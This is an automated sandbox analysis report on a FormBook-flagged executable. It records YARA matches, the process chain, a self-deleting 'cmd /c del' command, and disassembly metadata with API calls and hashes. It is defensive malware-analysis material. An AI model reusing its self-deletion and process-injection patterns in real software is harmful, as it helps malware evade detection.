MD5 hash:	A3B74ACF9723E53D6CAEA736FAAE9708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: INv02938727.exe PID: 3632 Parent PID: 4852

General

Start time:	07:31:23
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\INv02938727.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\INv02938727.exe
Imagebase:	0x7f0000
File size:	719360 bytes
MD5 hash:	A3B74ACF9723E53D6CAEA736FAAE9708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3292 Parent PID: 3632

General

Start time:	07:31:25
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff662bf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: autochk.exe PID: 6960 Parent PID: 3292

General

Start time:	07:31:48
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0x280000
File size:	871424 bytes
MD5 hash:	34236DB574405291498BCD13D20C42EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 7072 Parent PID: 3632

General

Start time:	07:31:54
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xb90000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7088 Parent PID: 7072

General

Start time:	07:31:56
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\INv02938727.exe'
Imagebase:	0x1320000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7096 Parent PID: 7088

General

Start time:	07:31:56
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: INv02938727.exe PID: 4852 Parent PID: 5796 INv02938727.exeCOMMON

Executed Functions

Function 00B5BBB8, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E

Strings

Tnt, xrefs: 00B5BD46
Tnt, xrefs: 00B5BD6B

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HandleModule
String ID: Tnt$Tnt
API String ID: 4139908857-2628351990
Opcode ID: 91f5af95cce5995285269e6acb94ef7687fb21433612eb033d04986fe7bc1c19
Instruction ID: b1168c6a02292bec50d9199344b9924d9027eca2999ffb3777898421821dccce
Opcode Fuzzy Hash: 91f5af95cce5995285269e6acb94ef7687fb21433612eb033d04986fe7bc1c19
Instruction Fuzzy Hash: 90811570A00B058FD724CF2AC055B6ABBF1FF88305F0489ADD986DBA40DB75A8498F95

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B1EC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 521af39bac0f167aff981103019aada22ada001ccc085578ca99848f1e96c652
Instruction ID: 47520326959f478b2a33e25fc82dabe0a0e5e490d3f4d05378e4d65f60e7e493
Opcode Fuzzy Hash: 521af39bac0f167aff981103019aada22ada001ccc085578ca99848f1e96c652
Instruction Fuzzy Hash: C951ACB1D00309AFDB14CF9AC884ADEBBB5FF48314F64826AE819AB250D7749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B5DC6D, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 61204a1f2c248052164bff328411dc65002a1666f7372f290b56d6bd9f85db1c
Instruction ID: a70002109abc4dd3754ca7f17100a2fdbe74968d4db3691362c0f41dae2dca4d
Opcode Fuzzy Hash: 61204a1f2c248052164bff328411dc65002a1666f7372f290b56d6bd9f85db1c
Instruction Fuzzy Hash: 8751CFB1D00349DFDB15CF99C880ADEBBB1FF48314F64826AE819AB250D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B56D51, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E4F

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7c4c0685725284f62877cd88ff57f25aa8867992c11ef80cdeb66eb12e607a40
Instruction ID: 16a69ef3881c7edfd256c105495b8ff129c9b4071c2a17ba7090d47699a68345
Opcode Fuzzy Hash: 7c4c0685725284f62877cd88ff57f25aa8867992c11ef80cdeb66eb12e607a40
Instruction Fuzzy Hash: 8A416B76A00248AFCB11CFA9D884AEEBFF5FF59310F1480AAE944A7311D3359955CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B56DC0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E4F

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9f3449ecde58ab93de3e8fc255f656e6f4d376d55fc4c848f0b4e3bb3512750e
Instruction ID: 1abc78e03d4bb40d5407bfffc586b96b448e7d6680b62d583013650ea367d6cd
Opcode Fuzzy Hash: 9f3449ecde58ab93de3e8fc255f656e6f4d376d55fc4c848f0b4e3bb3512750e
Instruction Fuzzy Hash: 0721F2B59003489FDB00CFA9D884AEEBBF4FF49324F54805AE914A7210D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B56DC8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E4F

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bd39e72077157a632df65ef9d83f6fa3b9811e9cc49837460403b1c98f856cb3
Instruction ID: 18106abb693f1805ec77dd5a2661f31f43a0ce3f937794d42856b9c768a31116
Opcode Fuzzy Hash: bd39e72077157a632df65ef9d83f6fa3b9811e9cc49837460403b1c98f856cb3
Instruction Fuzzy Hash: 4021F3B5D002089FDB10CFAAD884AEEBBF8FB48324F54805AE914B3310D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2fcef293f1653406c443e3754bfcf672acecd768f9979ae808df5c7205400936
Instruction ID: 561b81172844cb8c5d36522abc583119efd0321610620d54dca71866e591df72
Opcode Fuzzy Hash: 2fcef293f1653406c443e3754bfcf672acecd768f9979ae808df5c7205400936
Instruction Fuzzy Hash: DC1122B69003088FCB10CF9AC444BEEBBF5EB48324F14846AE915A7200C375A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3018f4b02a0fcd7c77560c99f2d6f8a81a72ca1b32ab821f98bcfd2a4012fe07
Instruction ID: 0f42e346cb2edd7702000383bb1691e9d03342ced557829d6bf63280025a6548
Opcode Fuzzy Hash: 3018f4b02a0fcd7c77560c99f2d6f8a81a72ca1b32ab821f98bcfd2a4012fe07
Instruction Fuzzy Hash: A111F2B6D003098FCB10CF9AC844BDEFBF5EB89324F54856AE915A7200C375A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3021d2fa63d0f50e066cb62bd283fd541abbb52e2741f90223168b9e8d628d6c
Instruction ID: 7653d5763b1c1f79280a1c5761b7f05e7bc750bf66548a42c16e4da202f1eacb
Opcode Fuzzy Hash: 3021d2fa63d0f50e066cb62bd283fd541abbb52e2741f90223168b9e8d628d6c
Instruction Fuzzy Hash: 6211E0B6D003498FCB10CF9AC444BDEFBF4EB88324F14856AD929A7600D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5DEB9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d6f461eb71c37b723d389d65533edd23b8ecbd7c59eeb32335aa71eb17cc05d8
Instruction ID: c70a86a7302e7c62483b73fad502bf13dc36a4e3e1552d670fa622c70ec7453c
Opcode Fuzzy Hash: d6f461eb71c37b723d389d65533edd23b8ecbd7c59eeb32335aa71eb17cc05d8
Instruction Fuzzy Hash: C91145B59003089FDB20CF89C485BDEBBF8EB48324F10855AE915B7340C3B4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 9e5f7cb68a9c9466dd3b9d0c14552ff43fb3c64a59cee54c8ec7162085192de8
Instruction ID: 04e8f561bb9ff472127661ef0e9db5b34e5ad43c9fcbb45354af3fdd7ac75e73
Opcode Fuzzy Hash: 9e5f7cb68a9c9466dd3b9d0c14552ff43fb3c64a59cee54c8ec7162085192de8
Instruction Fuzzy Hash: AD1112B58003099FDB20CF9AD484BDEBBF8EB48324F10855AE915A7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0073D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249071067.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953ee0b715d1cc1a98a476bbf60853ef06f09046bcd5b60931f92a45e44b27d3
Instruction ID: 5ca08032f0324841bcae002c068974b3c29c09554e3b2aa6967088ab9ab87dca
Opcode Fuzzy Hash: 953ee0b715d1cc1a98a476bbf60853ef06f09046bcd5b60931f92a45e44b27d3
Instruction Fuzzy Hash: 1A213AB1504340DFEB25CF10E9C0B26BB65FB98328F24C569D9054B207C33ADC66CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0074D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249110626.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889bd1031efd1d239419ff76f9f28fc125a31698125455c31e7b17b948a4154a
Instruction ID: c019fb763ce03dca43ce4dc5fed058542b02dd9d06fa47e7d0be7184c0ca3595
Opcode Fuzzy Hash: 889bd1031efd1d239419ff76f9f28fc125a31698125455c31e7b17b948a4154a
Instruction Fuzzy Hash: BD21F575604340DFCB24DF10D9C4B26BB65FB88314F24C569D9894B256C33ADC47CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0073D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249071067.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb6f45f99f13ba36cd1d5269e69751166481fccfc8e38c5a99d592aea1af103
Instruction ID: 3080c17484da398742b23f91b03850bbda79a182c24a2a561a71b4334cb722d7
Opcode Fuzzy Hash: 2eb6f45f99f13ba36cd1d5269e69751166481fccfc8e38c5a99d592aea1af103
Instruction Fuzzy Hash: 0211B176504280CFDB16CF10D9C4B16BF71FB94324F24C6A9D8050B617C33AD866CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0074D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249110626.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aceabd5b6c7afe53da3ac2b56c4f12c50baa048835df7beea761578ce490779
Instruction ID: 27d403c6f429a415fe7d4b351c7f92106793c5bbb09d0f68b1a399bdd9280484
Opcode Fuzzy Hash: 7aceabd5b6c7afe53da3ac2b56c4f12c50baa048835df7beea761578ce490779
Instruction Fuzzy Hash: F9118B75504280DFCB25CF14D5D4B15BBA1FB88324F28C6AAD8494B666C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0073D749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249071067.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5063797ede0da4089a73683f8687a9abe481054a0405e9dd6480ef7e0233804
Instruction ID: 34bc6ec3e3205b74ea3be112b0ce6ea56e795bee11d5392abf388166acd30852
Opcode Fuzzy Hash: e5063797ede0da4089a73683f8687a9abe481054a0405e9dd6480ef7e0233804
Instruction Fuzzy Hash: 1601F2B1508380AAF7308A22EC84B66FB98EF55334F18C55AED045A347C37C9C40CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0073D748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249071067.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a085e28bda47c92e6b41a479e7d9641cb404670a62b6e383a9290c5c4c4acc9
Instruction ID: 358eb584d0530515f72e16dc68af0a449f6bf7de0dc824f0e929ed2c85a99003
Opcode Fuzzy Hash: 9a085e28bda47c92e6b41a479e7d9641cb404670a62b6e383a9290c5c4c4acc9
Instruction Fuzzy Hash: 40F06271508384AAF7208A16DCC4B62FBA8EB95774F18C55AED185B387C3799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B5C2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c3e88859f0b5405264268e49bbc4839a083a249fd4c83a74b4cce474aec7e2
Instruction ID: 1ea2d8e47edf1b898fec10664a049ba52e75f319b16464f005093cc1b641b16c
Opcode Fuzzy Hash: 74c3e88859f0b5405264268e49bbc4839a083a249fd4c83a74b4cce474aec7e2
Instruction Fuzzy Hash: A25269F19807068FD758CF1EE88869D7BB1FB40318BE08A48C5617BA90E3B5756ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 00B59968, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.249547015.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ae37aadb5a15db7d35745576ec076e1ed6b5b111770ddd584a9e3045458699
Instruction ID: 23eb3c3d97681dff857461f77f590b465d3a0bb448e20b1e6d38757214e2888a
Opcode Fuzzy Hash: e8ae37aadb5a15db7d35745576ec076e1ed6b5b111770ddd584a9e3045458699
Instruction Fuzzy Hash: 47A18032E002198FCF05DFA5C844ADDBBF2FF85305B1585AAE905BB221EB35A959CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: INv02938727.exe PID: 3632 Parent PID: 4852 INv02938727.exeCOMMON

Executed Functions

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d423d28a46887a95991027f1fc6b9dbb967b4dc16229f4d28ee33bcce15d3ee4
Instruction ID: 2923ce401c32cf3eaadba16ddb3cc02ba4a39d8693a35c7c05a9fb64cd586e21
Opcode Fuzzy Hash: d423d28a46887a95991027f1fc6b9dbb967b4dc16229f4d28ee33bcce15d3ee4
Instruction Fuzzy Hash: 07F049B2200109AFCB04DF88DC81EEB77A9EF8C724F058249FA1C97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8d4469e25ea6339a6d78ef32bad5d41cb8a0887f7274499fafa4c48bfb05778c
Instruction ID: 7114f569ce6a7fa02e3dd21168807b6094edd38ed0fdad69c54db1872ca6c328
Opcode Fuzzy Hash: 8d4469e25ea6339a6d78ef32bad5d41cb8a0887f7274499fafa4c48bfb05778c
Instruction Fuzzy Hash: 0D01E4B2211108ABCB08CF98DC91EEB37ADAF8C714F158248FA0CA7241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
